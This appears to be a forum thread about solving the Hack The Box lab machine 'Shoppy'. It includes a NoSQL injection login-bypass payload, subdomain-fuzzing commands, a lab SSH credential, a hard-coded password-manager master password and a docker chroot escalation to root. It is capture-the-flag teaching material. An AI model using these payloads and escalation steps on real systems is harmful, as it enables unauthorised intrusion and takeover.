Posts: 10 Threads: 0 Joined: N/A
September 18, 2022 at 5:47 AM

(September 18, 2022, 03:41 AM) RF0vmM9n87Go Wrote:
> WOW, really didn't like this box.
> Wondering how you guys sniffed out a couple things:
> 1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
> 2. the josh user in export - after the fact I ran a wfuzz on that endpoint with xato wordlist to find it (is that how?)
> 3. the mattermost subdomain

Not only will admin'||'1==1 bypass auth, but also if entered into search field, then it will return user info with hashed passwords.

Finding mattermost subdomain:

ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.1.205 -fs 169

(September 18, 2022, 05:42 AM) WhiteWolf9007 Wrote:
> (September 18, 2022, 03:02 AM) 7r4c3 Wrote:
> > (September 17, 2022, 11:40 PM) hack5sucks Wrote:
> > > (September 17, 2022, 11:37 PM) wesleyjones001 Wrote:
> > > > I figured out why this payload is needed.
> > > > Example alternatives:
> > > > admin' || '"123"
> > > > admin' || '"anything_in_here_except_single_quotes"
> > > > josh' || '""
> > > > admin' || '""
> > > > Unfortunately this type of payload does not seem to be on any major sites.
> > > > It would also be possible to brute force the username using this payload using ffuf.
> > >
> > > Sample was a deploy's password??
> >
> > (September 17, 2022, 11:32 PM) ysoserious Wrote:
> > > (September 17, 2022, 11:31 PM) dumpster Wrote:
> > > > Did you get the root
> > >
> > > Yes
> >
> > how you guys found a password for deploy?
> > SSH into jaeger:Sh0ppyBest@pp!
> > Do cd ~
> > Then, sudo /home/deploy/password-manager -u 'deploy'
> > Now read the creds
> > And SSH as deploy
> > using gtfo we have docker run -v /:/mnt --rm -it alpine chroot /mnt sh
> > rooted!! (:
>
> mine is showing that user jaeger is not allowed to execute this as root.

sudo -u deploy /home/deploy/password-manager

Posts: 8 Threads: 0 Joined: N/A
September 18, 2022 at 6:40 AM

(September 18, 2022, 05:47 AM) br4v0ch4rl33 Wrote:
> Not only will admin'||'1==1 bypass auth, but also if entered into search field, then it will return user info with hashed passwords.
> Finding mattermost subdomain:
> ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.1.205 -fs 169

Ahhh thanks! Idk why I didn't think of sqli on the search field after login. Makes sense! Yeah I was fuzzing for the subdomain with a bad wordlist so I didn't know if there were any breadcrumbs that pointed to it. Sounds like it was just more random enuming and hoping your wordlist had "mattermost" in it. One last thing, how did you come up with the injection string? It's different than what I've used and seen in the past. Cheers!

Posts: 0 Threads: 0 Joined: N/A
September 18, 2022 at 7:06 AM

How did u find user josh for the mattermost cred?

Posts: 5 Threads: 0 Joined: N/A
September 18, 2022 at 7:47 AM

(September 18, 2022, 05:47 AM) br4v0ch4rl33 Wrote:
> [...]
> sudo -u deploy /home/deploy/password-manager

where did u get the master password for this? and also how u knew this command, like sudo -l has this access but the recon after that

Posts: 0 Threads: 0 Joined: N/A
September 18, 2022 at 7:57 AM

(September 18, 2022, 07:47 AM) WhiteWolf9007 Wrote:
> [...]
> where did u get the master password for this? and also how u knew this command, like sudo -l has this access but the recon after that

This way:

cat /home/deploy/password-manager

U will see:

Welcome to Josh password manager!
Please enter your master password:
Sample
Access granted! Here is creds !
cat /home/deploy/creds.txt
Access denied! This incident will be reported !

Pay attention to this: "Access denied" is logging in deny. Before that, it tried to read creds.txt. So we see "Access granted" is logging in success. So 'Sample' is the master password!

Posts: 31 Threads: 0 Joined: N/A
September 18, 2022 at 9:01 AM

(September 17, 2022, 10:32 PM) araaraara Wrote:
> (September 17, 2022, 10:22 PM) annehathaway Wrote:
> > You can sudo -l to check what commands you can run, you'll see you can run as deploy a tool called password-manager. If you strings on the binary you won't see the password but if you just cat it you'll find deploy's password. Then, you are able to use docker, gtfobins to see how to get a shell as root..
>
> I can't figure out tho how you are able to bypass login auth on shoppy Admin, never seen and couldn't find that admin'||"===' payload if someone can explain it to me please)

can't find the password using cat, where is the password? tried many times, not able to get access, please help

Posts: 31 Threads: 0 Joined: N/A
September 18, 2022 at 9:26 AM

(September 18, 2022, 07:57 AM) nhocit Wrote:
> [...]
> So 'Sample' is the master password!

Not able to get access by Sample password

Posts: 0 Threads: 0 Joined: N/A
September 18, 2022 at 9:40 AM

(September 18, 2022, 09:26 AM) pandu Wrote:
> [...]
> Not able to get access by Sample password

sudo -u deploy /home/deploy/password-manager

Enter password for jaeger. Then master password is required, enter Sample (S is a capital letter). If not then terminate the machine in Hackthebox, and create a new instance!

Posts: 31 Threads: 0 Joined: N/A
September 18, 2022 at 9:44 AM

(September 18, 2022, 09:40 AM) nhocit Wrote:
> [...]
> Enter password for jaeger. Then master password is required, enter Sample (S is a capital letter). If not then terminate the machine in Hackthebox, and create a new instance!

Thanks for this one bro I got it.

Posts: 22 Threads: 0 Joined: N/A
September 18, 2022 at 10:19 AM

(September 18, 2022, 03:41 AM) RF0vmM9n87Go Wrote:
> WOW, really didn't like this box.
> Wondering how you guys sniffed out a couple things:
> 1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
> 2. the josh user in export - after the fact I ran a wfuzz on that endpoint with xato wordlist to find it (is that how?)
> 3. the mattermost subdomain

1. this is NoSQL injection. you can check the web source codes after login as josh.
2. same NoSQL injection applies to search.
3. this is which i dislike most. of all the wordlists under SecLists/Discovery/DNS/, only 2 contain this subdomain, which are not in my frequently used wordlists for vhost enumeration.